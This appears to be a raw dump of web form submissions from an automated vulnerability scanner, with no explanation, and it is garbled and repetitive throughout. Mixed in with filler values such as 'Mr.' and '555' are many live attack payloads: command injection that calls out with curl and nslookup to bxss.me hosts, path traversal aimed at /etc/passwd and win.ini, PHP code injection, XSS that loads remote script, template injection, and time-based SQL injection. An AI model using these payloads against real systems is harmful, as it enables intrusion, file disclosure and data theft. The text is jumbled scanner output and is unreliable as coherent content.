(nslookup -q=cname hitvmqtpytjts5fbcf.bxss.me||curl hitvmqtpytjts5fbcf.bxss.me))

/../../../../../../../../../../windows/system32/BITSADMIN.exe

file:///etc/passwd

../../../../../../../../../../../../../../windows/win.ini

|echo yzwxfb$()\ vygwfz\nz^xyu||a #' |echo yzwxfb$()\ vygwfz\nz^xyu||a #|" |echo yzwxfb$()\ vygwfz\nz^xyu||a #

&echo wvwcwk$()\ ikhxzx\nz^xyu||a #' &echo wvwcwk$()\ ikhxzx\nz^xyu||a #|" &echo wvwcwk$()\ ikhxzx\nz^xyu||a #

../../../../../../../../../../../../../../etc/passwd

^(#$!@#$)(()))******

/../../../../../../../../../../windows/system32/BITSADMIN.exe

echo gneiij$()\ fgqwej\nz^xyu||a #' &echo gneiij$()\ fgqwej\nz^xyu||a #|" &echo gneiij$()\ fgqwej\nz^xyu||a #

!(()&&!|*|*|

&n938393=v944240

74jeWA3T

".gethostbyname(lc("hitrj"."azyqnxki4adc1.bxss.me."))."A".chr(67).chr(hex("58")).chr(110).chr(82).chr(103).chr(84)."

)

'.gethostbyname(lc('hitem'.'gltyxfchb2ce8.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(101).chr(66).chr(112).chr(70).'

&n962114=v990802

'.print(md5(31337)).'

${@print(md5(31337))}\

"||sleep(271000)tlewzv||"

${@print(md5(31337))}

1LtFPHyxO

";print(md5(31337));$a="

'||sleep(271000)ctiydw||'

"&&sleep(271000)clmwmb&&"

';print(md5(31337));$a='

;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

^(#$!@#$)(()))******

".gethostbyname(lc("hitef"."gzkxetcd4264c.bxss.me."))."A".chr(67).chr(hex("58")).chr(118).chr(73).chr(101).chr(84)."

'&&sleep(271000)rddjeq&&'

'.gethostbyname(lc('hitzh'.'vdtnyges59c7c.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(122).chr(87).chr(99).chr(73).'

!(()&&!|||

'"()

1Scm6lveO

bxss.me

555

c:/windows/win.ini

555

/etc/shells

555

Http://bxss.me/t/fit.txt

555

http://bxss.me/t/fit.txt%3F.

555

1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.

555

http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

bxss.me

Mr.

c:/windows/win.ini

Mr.

/etc/shells

Mr.

http://bxss.me/t/fit.txt%3F.jpg

Mr.

Http://bxss.me/t/fit.txt

Mr.

1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg

Mr.

http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

'+'A'.concat(70-3).concat(22*4).concat(100).concat(68).concat(113).concat(88)+(require'socket'

555

Mr.

555

"+"A".concat(70-3).concat(22*4).concat(109).concat(81).concat(118).concat(82)+(require"socket"

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

'+'A'.concat(70-3).concat(22*4).concat(118).concat(83).concat(102).concat(83)+(require'socket'

Mr.

555

Mr.

"+"A".concat(70-3).concat(22*4).concat(102).concat(83).concat(101).concat(90)+(require"socket"

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

./Mr.

555

Mr.

555

Mr.

555

Mr.

555

../Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

file:///etc/passwd

555

Mr.

555

Mr.

555

../../../../../../../../../../../../../../windows/win.ini

555

Mr.

555

../../../../../../../../../../../../../../etc/passwd

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

'.print(md5(31337)).'

555

Mr.

555

Mr.

555

${@print(md5(31337))}\

555

Mr.

555

Mr.

555

${@print(md5(31337))}

555

Mr.

./555

Mr.

../555

";print(md5(31337));$a="

555

Mr.

555

Mr.

file:///etc/passwd

';print(md5(31337));$a='

555

Mr.

../../../../../../../../../../../../../../windows/win.ini

;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

555

Mr.

../../../../../../../../../../../../../../etc/passwd

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

'.print(md5(31337)).'

Mr.

555

Mr.

${@print(md5(31337))}\

Mr.

${@print(md5(31337))}

Mr.

555

Mr.

";print(md5(31337));$a="

Mr.

555

Mr.

';print(md5(31337));$a='

Mr.

';print(md5(31337));$a='

Mr.

;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

".gethostbyname(lc("hitvj"."hxnlnpzw62092.bxss.me."))."A".chr(67).chr(hex("58")).chr(106).chr(81).chr(107).chr(87)."

555

Mr.

555

Mr.

555

'.gethostbyname(lc('hitkr'.'texwiahub64ba.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(107).chr(77).chr(98).chr(68).'

555

'.gethostbyname(lc('hitkr'.'texwiahub64ba.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(107).chr(77).chr(98).chr(68).'

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

".gethostbyname(lc("hitpl"."mdziqwop564ee.bxss.me."))."A".chr(67).chr(hex("58")).chr(120).chr(78).chr(115).chr(80)."

Mr.

555

Mr.

'.gethostbyname(lc('hityl'.'hxqqslny165ff.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(121).chr(85).chr(116).chr(65).'

Mr.

'.gethostbyname(lc('hityl'.'hxqqslny165ff.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(121).chr(85).chr(116).chr(65).'

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.<aVaCJHC x=9579>

Mr.<ifRAme sRc=9121.com></IfRamE>

Mr.<WF9P3B>ISNEZ[!+!]</WF9P3B>

Mr.s1cgt

Mr.}body{zzz:Expre/**/SSion(glOn(9825))}

<a HrEF=jaVaScRiPT:>

Mr.

<a HrEF=http://xss.bxss.me></a>

Mr.<input autofocus onfocus=glOn(9919)>

�<img zzz onmouseover=glOn(99571) //�>

Mr.<ScRiPt>glOn(9292)</sCripT>

Mr.\u003CScRiPt\glOn(9818)\u003C/sCripT\u003E

%4D%72%2E%3C%53%63%52%69%50%74%20%3E%67%6C%4F%6E%289456%29%3C%2F%73%43%72%69%70%54%3E

Mr.<img/src=">" onerror=alert(9331)>

Mr.<img src=xyz OnErRor=glOn(9350)>

Mr.<img src=//xss.bxss.me/t/dot.gif onload=glOn(9631)>

Mr.

Mr.<body onload=glOn(9207)>

Mr.<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9060'>

Mr.<isindex type=image src=1 onerror=glOn(9492)>

Mr.<svg

Mr.<InvalidTag

Mr.<InvalidTag/zzz src=//xss.bxss.me/t/xss.js?9840></ScRiPt>

Mr.<InvalidTag

Mr.%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%67%6C%4F%6E%28%39%31%31%34%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E

Mr.<InvalidTag>glOn(9612)</script>

Mr.

Mr.<WO3NRD>PLZEA[!+!]</WO3NRD>

Mr.<InvalidTag >glOn(9438)</ScRiPt>

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

dfb${98991*97996}::.x

dfb[[${98991*97996}]]xca

dfb{{98991*97996}}xca

Mr.

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

Mr.

Mr.

<th:t="${dfb}#foreach

<%={{={@{#{${dfb}}%>

\<\%\=\{\{\=\{\@\{\#\{\$\{dfb\}\}\%\>

<%={{={@{#{${dfb}}%>

bfgx8048%C0%BEz1%C0%BCz2a%90bcxhjl8048

bfg5734%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9hjl5734

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

dfb${98991*97996}::.x

Mr.

dfb[[${98991*97996}]]xca

dfb{{98991*97996}}xca

Mr.

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

Mr.

Mr.

<th:t="${dfb}#foreach

Mr.

<%={{={@{#{${dfb}}%>

bfgx2856%C0%BEz1%C0%BCz2a%90bcxhjl2856

bfg3343%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9hjl3343

Mr.9388217

Mr.

19745687

Mr.

'"()&%<zzz><InvalidTag >glOn(9769)</ScRiPt>

Mr.

'"()&%<zzz><InvalidTag >EscH(9412)</ScRiPt>

Mr.

'"()&%<zzz><InvalidTag >IFPP(9333)</ScRiPt>

Mr.'"()&%<zzz><InvalidTag >glOn(9193)</ScRiPt>

Mr.

1'"()&%<zzz><InvalidTag >EscH(9633)</ScRiPt>

Mr.

Mr.

Mr.

Mr.<a85Kx9a<

Mr.<img sRc='http://attacker-9856/log.php?

Mr.<atDaD2y x=9854>

Mr.<ifRAme sRc=9762.com></IfRamE>

Mr.

Mr.<WVJ9EO>7MIG2[!+!]</WVJ9EO>

Mr.kaojw

Mr.}body{zzz:Expre/**/SSion(CBel(9171))}

<a HrEF=jaVaScRiPT:>

<a HrEF=http://xss.bxss.me></a>

Mr.<input autofocus onfocus=CBel(9521)>

�<img zzz onmouseover=CBel(97641) //�>

Mr.<ScRiPt>CBel(9628)</sCripT>

Mr.

Mr.\u003CScRiPt\CBel(9850)\u003C/sCripT\u003E

%4D%72%2E%3C%53%63%52%69%50%74%20%3E%43%42%65%6C%289498%29%3C%2F%73%43%72%69%70%54%3E

Mr.<img/src=">" onerror=alert(9717)>

Mr.<img src=xyz OnErRor=CBel(9843)>

Mr.<img src=//xss.bxss.me/t/dot.gif onload=CBel(9781)>

Mr.<body onload=CBel(9271)>

Mr.

Mr.<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9422'>

Mr.<isindex type=image src=1 onerror=CBel(9965)>

Mr.<svg

Mr.<InvalidTag

Mr.<InvalidTag/zzz src=//xss.bxss.me/t/xss.js?9581></ScRiPt>

Mr.

Mr.<InvalidTag

Mr.

Mr.%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%43%42%65%6C%28%39%31%33%39%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E

Mr.

Mr.<InvalidTag>CBel(9428)</script>

Mr.

Mr.<WAMKBN>MEESI[!+!]</WAMKBN>

Mr.

Mr.<InvalidTag >CBel(9311)</ScRiPt>

Mr.

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

Mr.

dfb${98991*97996}::.x

Mr.

Mr.

dfb[[${98991*97996}]]xca

Mr.

dfb{{98991*97996}}xca

Mr.

Mr.

Mr.

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

Mr.

Mr.

<th:t="${dfb}#foreach

Mr.

Mr.

Mr.

Mr.

1%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%69%55%6B%45%28%39%34%35%37%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E

<%={{={@{#{${dfb}}%>

Mr.

bfgx9432%C0%BEz1%C0%BCz2a%90bcxhjl9432

Mr.

bfg10980%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9hjl10980

Mr.

Mr.

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

Mr.

Mr.

dfb${98991*97996}::.x

Mr.

dfb{{98991*97996}}xca

Mr.

dfb[[${98991*97996}]]xca

Mr.

dfb{{98991*97996}}xca

Mr.

Mr.

Mr.

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

Mr.

Mr.

Mr.

<th:t="${dfb}#foreach

Mr.

Mr.

<%={{={@{#{${dfb}}%>

Mr.

bfgx3906%C0%BEz1%C0%BCz2a%90bcxhjl3906

bfg7402%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9hjl7402

Mr.

Mr.

Mr.9716525

Mr.

19784415

Mr.

Mr.

'"()&%<zzz><InvalidTag >btTd(9046)</ScRiPt>

'"()&%<zzz><InvalidTag >CBel(9433)</ScRiPt>

Mr.

Mr.'"()&%<zzz><InvalidTag >CBel(9782)</ScRiPt>

Mr.

1'"()&%<zzz><InvalidTag >btTd(9554)</ScRiPt>

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.<a9w7SZN<

Mr.<img sRc='http://attacker-9429/log.php?

Mr.<aqKxcRW x=9166>

Mr.<ifRAme sRc=9601.com></IfRamE>

Mr.<WUFZBR>ORLDH[!+!]</WUFZBR>

Mr.HqAkt

Mr.}body{zzz:Expre/**/SSion(1MHx(9741))}

<a HrEF=jaVaScRiPT:>

<a HrEF=http://xss.bxss.me></a>

Mr.<input autofocus onfocus=1MHx(9880)>

�<img zzz onmouseover=1MHx(96561) //�>

Mr.<ScRiPt>1MHx(9665)</sCripT>

Mr.\u003CScRiPt\1MHx(9874)\u003C/sCripT\u003E

%4D%72%2E%3C%53%63%52%69%50%74%20%3E%31%4D%48%78%289289%29%3C%2F%73%43%72%69%70%54%3E

Mr.<img/src=">" onerror=alert(9112)>

Mr.<img src=xyz OnErRor=1MHx(9546)>

Mr.<img src=//xss.bxss.me/t/dot.gif onload=1MHx(9227)>

Mr.

Mr.<body onload=1MHx(9661)>

Mr.

Mr.<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9437'>

Mr.<isindex type=image src=1 onerror=1MHx(9059)>

Mr.

Mr.<svg

Mr.<InvalidTag

Mr.

Mr.<InvalidTag/zzz src=//xss.bxss.me/t/xss.js?9646></ScRiPt>

Mr.

Mr.<InvalidTag

Mr.

Mr.%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%31%4D%48%78%28%39%31%35%38%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E

Mr.

Mr.<InvalidTag>1MHx(9551)</script>

Mr.

Mr.

Mr.

Mr.<WYQEQH>YQY9I[!+!]</WYQEQH>

Mr.<InvalidTag >1MHx(9704)</ScRiPt>

Mr.

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

Mr.

dfb${98991*97996}::.x

Mr.

�<img zzz onmouseover=BPQi(96041) //�>

dfb[[${98991*97996}]]xca

Mr.

dfb{{98991*97996}}xca

Mr.

Mr.

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

Mr.

Mr.

Mr.

Mr.

Mr.

<th:t="${dfb}#foreach

Mr.

Mr.

Mr.

<%={{={@{#{${dfb}}%>

Mr.

Mr.

bfgx8322%C0%BEz1%C0%BCz2a%90bcxhjl8322

bfg9441%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9hjl9441

Mr.

1<InvalidTag

>BPQi(9193)</ScRiPt>

Mr.

Mr.

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

dfb${98991*97996}::.x

Mr.

dfb[[${98991*97996}]]xca

Mr.

dfb{{98991*97996}}xca

Mr.

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

Mr.

Mr.

Mr.

1<InvalidTag >BPQi(9937)</ScRiPt>

Mr.

<th:t="${dfb}#foreach

Mr.

Mr.

Mr.

<%={{={@{#{${dfb}}%>

Mr.

bfgx1603%C0%BEz1%C0%BCz2a%90bcxhjl1603

Mr.

bfg6236%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9hjl6236

Mr.

Mr.

Mr.9553171

Mr.

'"()&%<zzz><InvalidTag >1MHx(9766)</ScRiPt>

Mr.

Mr.'"()&%<zzz><InvalidTag >1MHx(9962)</ScRiPt>

Mr.

Mr.

19221802

Mr.

Mr.

'"()&%<zzz><InvalidTag >ZwHc(9642)</ScRiPt>

Mr.

Mr.

1'"()&%<zzz><InvalidTag >ZwHc(9805)</ScRiPt>

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

@@yIdX7

Mr.

1 ��%2527%2522

Mr.

1'"

Mr.

1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

Mr.

1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

Mr.

8ARqkLMH')) OR 374=(SELECT 374 FROM PG_SLEEP(15))--

Mr.

fnQ6agjZ') OR 894=(SELECT 894 FROM PG_SLEEP(15))--

Mr.

huVRELR6' OR 110=(SELECT 110 FROM PG_SLEEP(15))--

Mr.

-1)) OR 537=(SELECT 537 FROM PG_SLEEP(15))--

Mr.

-5) OR 370=(SELECT 370 FROM PG_SLEEP(15))--

Mr.

-5 OR 749=(SELECT 749 FROM PG_SLEEP(15))--

Mr.

Xeqs2Q4F')); waitfor delay '0:0:15' --

Mr.

7UhAn3jT'); waitfor delay '0:0:15' --

Mr.

97AlyWzz'; waitfor delay '0:0:15' --

Mr.

1 waitfor delay '0:0:15' --

Mr.

-1)); waitfor delay '0:0:15' --

Mr.

-1); waitfor delay '0:0:15' --

Mr.

-1; waitfor delay '0:0:15' --

Mr.

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

Mr.

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

Mr.

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

Mr.

if(now()=sysdate(),sleep(15),0)

Mr.

-1" OR 3*2>(0+5+571-571) --

Mr.

-1" OR 3*2<(0+5+571-571) --

Mr.

-1" OR 3+571-571-1=0+0+0+1 --

Mr.

-1" OR 2+571-571-1=0+0+0+1 --

Mr.

-1' OR 3*2>(0+5+476-476) or 'ugUgQZmC'='

Mr.

-1' OR 3*2<(0+5+476-476) or 'ugUgQZmC'='

Mr.

-1' OR 3+476-476-1=0+0+0+1 or 'ugUgQZmC'='

Mr.

-1' OR 2+476-476-1=0+0+0+1 or 'ugUgQZmC'='

Mr.

-1' OR 3*2>(0+5+933-933) --

Mr.

-1' OR 3*2<(0+5+933-933) --

Mr.

-1' OR 3+933-933-1=0+0+0+1 --

Mr.

-1' OR 2+933-933-1=0+0+0+1 --

Mr.

-1 OR 3*2>(0+5+809-809)

Mr.

-1 OR 3*2<(0+5+809-809)

Mr.

-1 OR 3+809-809-1=0+0+0+1

Mr.

-1 OR 2+809-809-1=0+0+0+1

Mr.

-1 OR 3*2>(0+5+96-96) --

Mr.

-1 OR 3*2<(0+5+96-96) --

Mr.

-1 OR 3+96-96-1=0+0+0+1 --

Mr.

-1 OR 2+96-96-1=0+0+0+1 --

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

@@KfBv4

1 ��%2527%2522

1'"

Mr.'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

GtC3kAae')) OR 93=(SELECT 93 FROM PG_SLEEP(15))--

vl9eNsyj') OR 547=(SELECT 547 FROM PG_SLEEP(15))--

643uoWs3' OR 878=(SELECT 878 FROM PG_SLEEP(15))--

mVozTE6C')); waitfor delay '0:0:15' --

Mr.

Mr.

Mr.

Mr.

W9T4anLO'); waitfor delay '0:0:15' --

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

C8g5P29B'; waitfor delay '0:0:15' --

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

1 waitfor delay '0:0:15' --

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

(select(0)from(select(sleep(15)))v)/'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"/

Mr.

dfb__${98991*97996}__::.x

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

Mr.

Mr.

1<auWa3y3<

Mr.

Mr.

1<img sRc='http://attacker-9419/log.php?

Mr.

Mr.

Mr.

1<atTTjO9 x=9348>

Mr.

1<ifRAme sRc=9149.com></IfRamE>

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

1<WMUKOX>07VWQ[!+!]</WMUKOX>

Mr.

Mr.

Mr.

Mr.

1FXeFA

Mr.

Mr.

Mr.

1}body{zzz:Expre/**/SSion(eKlN(9283))}

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

c:/windows/win.ini

Mr.

Mr.

Mr.

Mr.

Mr.

1<input autofocus onfocus=eKlN(9779)>

Mr.

�<img zzz onmouseover=eKlN(94391) //�>

Mr.

Http://bxss.me/t/fit.txt

Mr.

Mr.

Mr.

1<ScRiPt>eKlN(9018)</sCripT>

Mr.

Mr.

1\u003CScRiPt\eKlN(9069)\u003C/sCripT\u003E

Mr.

http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg

Mr.

Mr.

%31%3C%53%63%52%69%50%74%20%3E%65%4B%6C%4E%289997%29%3C%2F%73%43%72%69%70%54%3E

Mr.

1<img/src=">" onerror=alert(9603)>

Mr.

bxss.me

Mr.

c:/windows/win.ini

Mr.

1<img src=xyz OnErRor=eKlN(9372)>

Mr.

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

Mr.

Mr.

1<img src=//xss.bxss.me/t/dot.gif onload=eKlN(9241)>

Mr.

/etc/shells

Mr.

1<body onload=eKlN(9680)>

Mr.

http://bxss.me/t/fit.txt%3F.jpg

Mr.

1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9429'>

Mr.

Http://bxss.me/t/fit.txt

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg

Mr.

1<isindex type=image src=1 onerror=eKlN(9804)>

Mr.

Mr.

http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg

Mr.

1<svg

� onload=eKlN(9270);>

Mr.

Mr.

1<InvalidTag

>eKlN(9501)</ScRiPt>

Mr.

Mr.

Mr.

1<InvalidTag/zzz src=//xss.bxss.me/t/xss.js?9327></ScRiPt>

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

1<InvalidTag

>eKlN(9746)</ScRiPt>

Mr.

Mr.

1%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%65%4B%6C%4E%28%39%34%31%30%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E

Mr.

if(now()=sysdate(),sleep(15),0)

Mr.

1<InvalidTag>eKlN(9947)</script>

Mr.

Mr.

1<WJQHWN>TIUGC[!+!]</WJQHWN>

Mr.

1<InvalidTag >eKlN(9240)</ScRiPt>

Mr.

Mr.

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

Mr.

dfb__${98991*97996}__::.x

bxss.me

Mr.

Mr.

c:/windows/win.ini

Mr.

dfb[[${98991*97996}]]xca

Mr.

dfb{{98991*97996}}xca

Mr.

/etc/shells

Mr.

Mr.

http://bxss.me/t/fit.txt%3F.

Mr.

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

Mr.

Http://bxss.me/t/fit.txt

Mr.

${9999469+9999926}

Mr.

<th:t="${dfb}#foreach

Mr.

1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.

Mr.

<%={{={@{#{${dfb}}%>

Mr.

http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.

${10000028+9999697}

Mr.

bfgx5991%C0%BEz1%C0%BCz2a%90bcxhjl5991

Mr.

bfg7658%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9hjl7658

Mr.

-1" OR 2+38-38-1=0+0+0+1 --

Mr.

-1' OR 2+269-269-1=0+0+0+1 or 'M6EkW7h6'='

Mr.

Mr.

19536543

-1' OR 2+615-615-1=0+0+0+1 --

Mr.

-1 OR 2+762-762-1=0+0+0+1

Mr.

'"()&%<zzz><InvalidTag >eKlN(9361)</ScRiPt>

Mr.

Mr.

1'"()&%<zzz><InvalidTag >eKlN(9948)</ScRiPt>

Mr.

-1 OR 3*2>(0+5+668-668) --

Mr.

Mr.

1<esi:include src="http://bxss.me/rpb.png"/>

-1 OR 3*2<(0+5+668-668) --

Mr.

1RlAPvXCO

Mr.

1<esi:include src="http://bxss.me/rpb.png"/>

Mr.

1qk5EdVlO

Mr.

<!--

Mr.

Mr.

-1 OR 3+668-668-1=0+0+0+1 --

Mr.

Mr.

-1 OR 2+668-668-1=0+0+0+1 --

Mr.

Mr.<esi:include src="http://bxss.me/rpb.png"/>

1LM39pGpO

Mr.

wtEvxFXO

Mr.

Mr.9171006

Mr.

Mr.

'"()&%<zzz><InvalidTag >eKlN(9767)</ScRiPt>

Mr.

Mr.'"()&%<zzz><InvalidTag >eKlN(9807)</ScRiPt>

Mr.

${@print(md5(31337))}

Mr.

<!--

Mr.

Mr.

;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

Mr.

1"||sleep(27*1000)*reajka||"

Mr.

'"

Mr.

'.print(md5(31337)).'

Mr.

${@print(md5(31337))}\

Mr.

;(nslookup -q=cname hityantlptwmrbde86.bxss.me||curl hityantlptwmrbde86.bxss.me)|(nslookup -q=cname hityantlptwmrbde86.bxss.me||curl hityantlptwmrbde86.bxss.me)&(nslookup -q=cname hityantlptwmrbde86.bxss.me||curl hityantlptwmrbde86.bxss.me)

Mr.

../1

Mr.

Mr.

`(nslookup -q=cname hitlegvygemwwc5606.bxss.me||curl hitlegvygemwwc5606.bxss.me)`

Mr.

${@print(md5(31337))}

Mr.

'"()

Mr.

file:///etc/passwd

Mr.

";print(md5(31337));$a="

Mr.

1"||sleep(27*1000)*nffodd||"

Mr.

|(nslookup -q=cname hitdemndaaozid0550.bxss.me||curl hitdemndaaozid0550.bxss.me)

Mr.

../../../../../../../../../../../../../../windows/win.ini

Mr.

';print(md5(31337));$a='

Mr.

1'||sleep(27*1000)*irqefi||'

Mr.

../../../../../../../../../../../../../../etc/passwd

Mr.

;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

Mr.

1"&&sleep(27*1000)*jnymwc&&"

Mr.

./1

Mr.

1'&&sleep(27*1000)*pcxqbl&&'

Mr.

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

Mr.

